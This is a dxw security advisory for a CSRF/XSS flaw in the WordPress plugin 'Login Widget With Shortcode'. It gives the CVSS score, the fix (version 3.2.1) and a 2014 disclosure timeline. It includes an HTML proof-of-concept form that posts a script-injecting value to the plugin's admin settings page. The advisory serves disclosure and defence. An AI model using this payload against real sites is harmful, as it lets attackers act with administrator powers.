Software: Login Widget With Shortcode
Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do
Proof of concept
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=login_widget_afo\">
<input type=\"text\" name=\"custom_style_afo\" value=\"</textarea><script>alert(1)</script>\">
<input type=\"text\" name=\"option\" value=\"login_widget_afo_save_settings\">
Upgrade to version 3.2.1 or later.
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on email@example.com to acknowledge this report if you received it via a third party (for example, firstname.lastname@example.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
2014-09-15: Reported to vendor by email
2014-09-15: Vendor reported the issue fixed and a new version released
Discovered by dxw:
Please visit security.dxw.com for more information.